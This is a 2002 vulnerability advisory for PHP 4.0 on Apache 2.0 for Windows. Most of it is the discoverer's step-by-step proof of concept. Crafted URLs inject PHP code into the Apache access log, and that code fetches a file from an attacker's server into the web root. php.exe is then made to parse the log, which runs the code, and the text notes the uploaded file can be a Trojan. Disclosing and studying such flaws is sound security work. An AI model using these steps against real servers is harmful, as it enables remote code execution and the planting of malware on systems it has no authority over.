Reported January 23, 2002, by Paul Brereton.
PHP version 4.0 using Apache Web Server 2.0 for Windows 2000 and Windows NT
A vulnerability exists in PHP 4.0 for Windows using Apache Web Server 2.0. By exploiting PHP's ability to view files residing outside the normal HTML root directory, an attacker can execute arbitrary code by inserting a malicious PHP-based command into the Apache log file.
The discoverer posted the following demonstration as proof-of-concept:
1) Create a text file on your Web Server called mytestfile.txt.
2) Write a short line of text in it.
3) Check how big the file is (in bytes).
4) Test that the file can be accessed via your browser by typing http://\[YOUR_SERVER_IP\]/mytestfile.txt.
5) Check that the file exists on the server by typing http://www.example.com/mytestfile.txt into your browser.
6) You now have to make 4 requests. (If the browser doesn't seem to connect, don't worry, it is. Don't press refresh in any step, otherwise this will not work. Remember to replace the brackets on the first two lines.)
7) Make the request in your browser. http://www.example.com/<?$fp=fopen("http://\[YOUR_SERVER_IP\]/mytestfile.txt"," rb");?>
8) Wait for about 10 seconds.
9) Make the request in your browser. http://www.example.com/<?$contents=fread($fp,\[REPLACE_WITH_THE_SIZE_OF_YOUR_FILE\]);?>
10) Wait for about 10 seconds.
11) Make the request in your browser. http://www.example.com/<?$fq=fopen("c:/Apache2/htdocs/mytestfile.txt","wb");?>
12) Wait for about 10 Seconds.
13) Make the request in your browser. http://www.example.com/<?fwrite($fq,$contents);?>
14) Wait for about 10 seconds.
15) Make a request for a non-existent file (to flush the access log) by typing http://www.example.com/nonexistantfile.htm.
16) Wait for about 10 seconds.
17) Get php.exe to parse the Apache log file by typing http://www.example.com/php/php.exe?c:\apache2\logs\access.log.
18) Press Refresh to make sure the log file has been parsed.
19) Check for the file on server by typing http://www.example.com/mytestfile.txt.
What happens is that php.exe runs the php code that has been logged in the Apache log file. The code in the Apache log file, then tells the server to download the file from your server and save it into the Apache directory.
The file uploaded can be a Trojan, .exe file, .php file, etc. There is no limitation to what and where you can upload.
It's a very simple task to write a Trojan with CGI headers and to execute it once uploaded.
The vendor, PHP, has been notified.
Discovered by Paul Brereton.